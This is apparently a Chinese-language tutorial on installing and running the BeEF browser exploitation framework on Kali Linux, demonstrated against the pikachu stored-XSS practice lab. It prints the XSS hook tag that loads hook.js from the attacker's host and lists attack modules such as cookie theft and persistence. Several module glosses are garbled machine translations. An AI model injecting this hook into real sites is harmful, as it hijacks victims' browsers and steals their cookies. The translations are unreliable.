Beef-Xss工具的简介
KaliLinux官网对这工具的介绍地址:https://www.kali.org/tools/beef-xss/
GitHub地址:https://github.com/beefproject/beef
Beef-Xss工具Wiki:https://github.com/beefproject/beef/wiki
BeEF 是浏览器开发框架的缩写,它是一款专注于网络浏览器的渗透测试工具
随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况,与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器
BeEF 将挂钩一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,并从浏览器上下文中进一步攻击系统
安装Beef-Xss工具
这个工具最新的KaliLinux版本这个工具默认是不安装的,之前老版本的是自带的不管这么
apt-get install beef-xss
或
sudo apt-get install beef-xss
一路 y 就好,然后等待
如果出现下图,解决方法换地址源或者 apt update
重启之后在执行安装命令
启动Beef-Xss工具
beef-xss
第一次启动可能会提示这个,让你输入一个新的密码,输入回车即可(不会显示你输入的密码)下一次就不会让你输入了
它会自动打开浏览器 beef 控制台(账号默认:beef 密码(你第一次进入beef输入的))
关闭Beef-Xss
beef-xss-stop
Beef-Xss登录账户密码忘记解决方案:
安装之后在 /usr/share/beef-xss 目录下有一个 config.yaml
文件里面记录了密码账号:
用 vim 或者其它方式打开config.yaml
文件中 credentials: 下的 user是账号、passwd是密码,直接修改保存即可
启动Beef-Xss之后控制台会有一下信息
beef的xss代码格式:
<script src="http://<IP>:3000/hook.js"></script>
例子:比如我的KaliLinux的ip地址:192.168.56.129
<script src="http://192.168.56.129:3000/hook.js"></script>
beef控制台地址
http://127.0.0.1:3000/ui/panel
或者我的KaliLinux的ip地址:192.168.56.129 在宿主机浏览器输入:http://192.168.56.129:3000/ui/panel 都可以
Beef-Xss使用
我用pikachu靶场xss的存储型演示:
上面已经看到成功了,有时不一定怎么快展示等一会刷新一下
获取这些之后,具体可以实现上面功能在 commands 中查看
commands 模块中大概都是什么意思
我这里用就直接用谷歌翻译了
点击任意一个都有说明的比如播放声音模块
Browser(浏览器模块)
Chrome Extensions (Chrome 扩展)
Debug (调试)
Exploits(漏洞利用)
Host(主持人)
IPEC(国际环保提倡)
利用通信 (IPEC)进行的操作
Metasploit
Misc(杂项)
Network(网络)
Persistence(坚持)
Phonegap(电话间隙)
Social Engineering(社会工程)
简单的使用一个播放声音
是有一个 biu的一个声音
检测是否有 VLC
获取cookie
还有很多功能的这里就不一一演示了